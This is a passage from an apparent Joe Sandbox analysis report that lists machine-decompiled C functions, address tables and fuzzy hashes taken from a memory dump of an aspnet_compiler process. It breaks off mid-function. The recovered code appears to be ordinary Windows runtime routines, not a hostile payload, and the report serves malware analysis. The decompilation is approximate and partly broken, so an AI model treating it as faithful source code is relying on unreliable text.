0x01130f55
0x01130f55
0x01130f59
0x010d52eb
0x010d52f1
0x010d52f1
0x01130e7d
0x01130e84
0x01130e88
0x01130e8a
0x01130e8a
0x01130e8d
0x01130e9e
0x01130ea3
0x01130ea3
0x01130ea7
0x01130eaf
0x01130eb3
0x01130eb9
0x01130eb9
0x01130ebc
0x01130ecd
0x01130ecd
0x00000000
0x01130eb3
0x01130e1e
0x01130e21
0x01130e25
0x01130e2b
0x01130e2f
0x01130e30
0x01130e3a
0x01130e3f
0x01130e41
0x00000000
0x00000000
0x01130e47
0x00000000
0x01130e47
0x01130df9
0x01130dfe
0x00000000
0x00000000
0x00000000
0x01130dfe
0x010d5303
0x010d5307
0x00000000
0x010d5309
0x00000000
0x010d5309
0x010d5307
0x010d52e9
0x010d52e9
0x00000000
0x010d52e9
0x010d530e
0x00000000

Strings

8-, xrefs: 010D52C4, 01130E70, 01130EE0

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 8-
API String ID: 0-1897437538
Opcode ID: ca09534d24b50412c04bbdf40e5e51210691002d6007ed56b91a8d275e269056
Instruction ID: 9a89c67229223159e38c929535d213d887b9e8eca35f21bfe79ab563e094921d
Opcode Fuzzy Hash: ca09534d24b50412c04bbdf40e5e51210691002d6007ed56b91a8d275e269056
Instruction Fuzzy Hash: 5751CB302043429FD725EF68C846B6BBBE4BFA4724F10092EF89587651E770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011A0EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E011A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0119FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E011A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01119730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0119A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0119A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x11c8b04 >> 0x14) + (_v44 -  *0x11c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E010F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0119138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E010F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0118FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x11c8724 & 0x00000008) != 0) {
						E011952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011A15B5(0x11c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x011a0eb7
0x011a0eb9
0x011a0ec0
0x011a0ec2
0x011a0ecd
0x011a105b
0x011a105b
0x011a1061
0x011a1066
0x011a1066
0x011a106b
0x011a1073
0x011a1073
0x011a0ed3
0x011a0ed6
0x011a0edc
0x011a0ee0
0x011a0ee7
0x011a0ef0
0x011a0ef5
0x011a0efa
0x011a0efc
0x011a0efd
0x011a0f03
0x011a0f04
0x011a0f06
0x011a0f07
0x011a0f09
0x011a0f0e
0x011a0f14
0x011a0f23
0x011a0f2d
0x011a0f34
0x011a0f34
0x011a0f14
0x011a0f52
0x00000000
0x00000000
0x011a0f58
0x011a0f73
0x011a0f74
0x011a0f79
0x011a0f7d
0x011a0f80
0x011a0f86
0x011a0fab
0x011a0fb5
0x011a0fc6
0x011a0fd1
0x011a0fe3
0x011a0fd3
0x011a0fdc
0x011a0fdc
0x011a0feb
0x011a1009
0x011a1009
0x011a1015
0x011a1027
0x011a1017
0x011a1020
0x011a1020
0x011a102f
0x011a103c
0x011a103c
0x011a1048
0x011a1050
0x011a1050
0x011a1055
0x00000000
0x011a1055
0x011a0f88
0x011a0f9e
0x011a0fa2
0x011a0fa9
0x00000000
0x00000000
0x00000000
0x011a0fa9
0x00000000

Strings

`, xrefs: 011A0F16

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 20ad95343c130a44795932b27f1fee6da949828376de5617ef8a1cc7d52131c8
Instruction ID: 11190511de04892a44fe89764ff281c690336db2aefedfd0d6ada3361ce6947b
Opcode Fuzzy Hash: 20ad95343c130a44795932b27f1fee6da949828376de5617ef8a1cc7d52131c8
Instruction Fuzzy Hash: 8251BF753043429FD729DF28D980B1BBBE9EBC8714F44092CFA9697290D770E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0110F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0110F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E010F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01119830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01119990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xe12d501a
							_t109 = L010F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000e12d
								E0111F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000e12d
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011195D0();
										L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0110f0d3
0x0110f0d9
0x0110f0e0
0x0110f0e7
0x0110f0f2
0x0110f0f4
0x0110f0f8
0x0110f100
0x0110f108
0x0110f10d
0x0110f115
0x0110f116
0x0110f11f
0x0110f123
0x0110f124
0x0110f12c
0x0110f130
0x0110f134
0x0110f13d
0x0110f144
0x0110f14b
0x0110f152
0x0114bab0
0x0114bab0
0x0110f158
0x0110f158
0x0110f15a
0x0110f160
0x0110f165
0x0110f166
0x0110f16f
0x0110f173
0x0114baa7
0x0114baa7
0x0114baab
0x00000000
0x0110f179
0x0110f179
0x0110f18d
0x0110f191
0x0114baa2
0x00000000
0x0110f197
0x0110f19b
0x0110f1a2
0x0110f1a9
0x0110f1af
0x0110f1b2
0x0110f1b6
0x0110f1b9
0x0110f1c0
0x0110f1c4
0x0110f1d8
0x0110f1df
0x0110f1e3
0x0110f1e6
0x0110f1eb
0x0110f1ee
0x0110f1f4
0x0110f20f
0x0114bab7
0x0114babb
0x0114bacc
0x0114bad1
0x0110f215
0x0110f218
0x0110f226
0x0110f22b
0x00000000
0x0110f22b
0x0110f1f6
0x0110f1f6
0x0110f1f9
0x0110f1fb
0x0110f1fb
0x0110f1f4
0x0110f191
0x0110f173
0x0110f152
0x0110f203

Strings

@, xrefs: 0110F124

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: e92f55115375e7074f02f4dea97a92db197cb287ae0bf4f7f63e63ccab6108a9
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 1651BD715047119FC325CF28C841A6BBBF8FF58714F00892EFA9587690E7B4E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01153540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01153540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x11cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01110BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01153706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0111FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01153540;
						E0111FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0112DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01160C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011197C0();
					}
					return E0111B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01153971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01153884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0111FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01119650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01153787(_a4,  &_v352, _t80);
						}
					}
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01153552
0x0115355a
0x0115355d
0x01153566
0x01153567
0x0115357e
0x0115358f
0x011535a1
0x011535a5
0x0115366b
0x0115366b
0x0115366d
0x01153672
0x01153679
0x01153685
0x0115368d
0x0115369d
0x011536a7
0x011536b8
0x011536c6
0x011536c7
0x011536dc
0x011536e1
0x011536e7
0x011536e9
0x011536e9
0x01153703
0x01153703
0x011535b5
0x011535c0
0x011535c4
0x00000000
0x00000000
0x011535ca
0x011535d7
0x011535e2
0x011535e6
0x011535e8
0x011535f5
0x011535fa
0x01153603
0x01153604
0x01153609
0x0115360a
0x01153612
0x01153613
0x0115361e
0x01153622
0x01153628
0x0115362f
0x0115362f
0x01153636
0x01153638
0x0115363b
0x01153642
0x01153642
0x01153636
0x01153657
0x01153657
0x0115365c
0x01153662
0x01153669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0115358F

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 7112787a5643d855aff962fb1d0022cdebd15d4eec9832666f42cf2f55e325fe
Instruction ID: c9ecd3398b52375be43c387e50c4cc5672cf6ba6863b9d46a3304bd77a5ed85f
Opcode Fuzzy Hash: 7112787a5643d855aff962fb1d0022cdebd15d4eec9832666f42cf2f55e325fe
Instruction Fuzzy Hash: A74166F2D1052D9BDB65DA50CC80FDEB77CAB44758F0045A9EA29A7240DB309F89CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 011A05AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E011A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01119730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0119A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0119A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E011A1293(_t79, _v40, E011A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E010F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0119138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x011a05c5
0x011a05ca
0x011a05d3
0x011a06db
0x011a06db
0x011a06dd
0x011a06e3
0x011a06e3
0x011a05dd
0x011a05e7
0x011a05f6
0x011a0600
0x011a0607
0x011a0610
0x011a0615
0x011a061a
0x011a061c
0x011a061e
0x011a0624
0x011a0625
0x011a0627
0x011a0628
0x011a0631
0x011a0640
0x011a064d
0x011a0654
0x011a0654
0x011a0631
0x011a066d
0x011a0674
0x00000000
0x00000000
0x011a0692
0x011a069e
0x011a06b0
0x011a06a0
0x011a06a9
0x011a06a9
0x011a06b8
0x011a06d6
0x011a06d6
0x00000000

Strings

`, xrefs: 011A0633

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 586ef0841ffe39b0ccee74dd41635e08c1ce9243900da9768c89d4b86f986070
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: F13102326047066BE724DE28CD85F9B7FD9EBC8758F144229FA58DB280D770E908CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01153884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01153884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01119650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L010F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01119650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01153893
0x01153896
0x01153899
0x0115389f
0x011538a0
0x011538a4
0x011538a9
0x011538ac
0x011538ad
0x011538ae
0x011538af
0x011538b1
0x011538b4
0x011538bb
0x011538bc
0x011538bd
0x011538c4
0x011538c8
0x011538ca
0x011538ca
0x011538d5
0x0115393e
0x01153940
0x01153942
0x01153952
0x01153954
0x01153961
0x01153961
0x01153967
0x0115396e
0x0115396e
0x01153947
0x0115394c
0x00000000
0x0115394c
0x011538ea
0x011538ee
0x011538f8
0x011538f9
0x011538ff
0x01153900
0x01153902
0x01153903
0x0115390b
0x0115390f
0x01153950
0x00000000
0x01153950
0x01153915
0x0115391d
0x0115391d
0x01153922
0x01153926
0x00000000
0x01153928
0x0115392b
0x0115392b
0x01153935
0x01153937
0x01153937
0x00000000
0x01153935
0x01153926
0x011538f0
0x00000000

Strings

BinaryName, xrefs: 011538B4

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 14640bad1c35e9a4ca4cc130fd63a653a884c2886539097e14039e1faba8a887
Instruction ID: 4b795a5cdc9f67fafbf83e5fe5b416fa606f68f62c95ea61d110ab79fad0fa9b
Opcode Fuzzy Hash: 14640bad1c35e9a4ca4cc130fd63a653a884c2886539097e14039e1faba8a887
Instruction Fuzzy Hash: 9131E5B291051AEFEB1DDA58C945EABFB74FF80760F014169ED74A7290E7309E00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0110D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0110D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x11cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E010F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0111B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011195D0();
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0110d29c
0x0110d2a6
0x0110d2b1
0x0110d2b5
0x0110d2b6
0x0110d2bc
0x0110d2bd
0x0110d2be
0x0110d2bf
0x0110d2c2
0x0110d2c4
0x0110d2cc
0x0110d384
0x0110d34b
0x0110d34f
0x0110d350
0x0110d351
0x0110d35c
0x0110d35c
0x0110d2d6
0x0110d2da
0x0110d2e1
0x0110d361
0x0110d369
0x0110d36d
0x0110d2e3
0x0110d2e3
0x0110d2e3
0x0110d2e5
0x0110d2ed
0x0110d2f5
0x0110d2fa
0x0110d302
0x0110d303
0x0110d30b
0x0110d30f
0x0110d313
0x0110d318
0x0110d31c
0x0110d320
0x0110d379
0x0110d37d
0x00000000
0x00000000
0x0114affe
0x0114b001
0x0114b011
0x00000000
0x0110d322
0x0110d322
0x0110d330
0x0110d337
0x0110d35d
0x0110d339
0x0110d33f
0x0110d38c
0x0110d38c
0x0110d33f
0x0110d349
0x00000000
0x0110d349

Strings

@, xrefs: 0110D303

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 145a2fa38199ef9f6685be4bada91981d234358bc35e3de9426845bf89915122
Instruction ID: 5675a15ff8e3d23623416be397b3ce2c0ec211259aba9981c5b04457ce09d051
Opcode Fuzzy Hash: 145a2fa38199ef9f6685be4bada91981d234358bc35e3de9426845bf89915122
Instruction Fuzzy Hash: 3831C1B190C3059FCB1ADFA8D8819ABBBE8FB85654F01092EF99487290D774DD04CB93

Uniqueness

Uniqueness Score: -1.00%

Function 010E1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E010E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0111BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0111A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
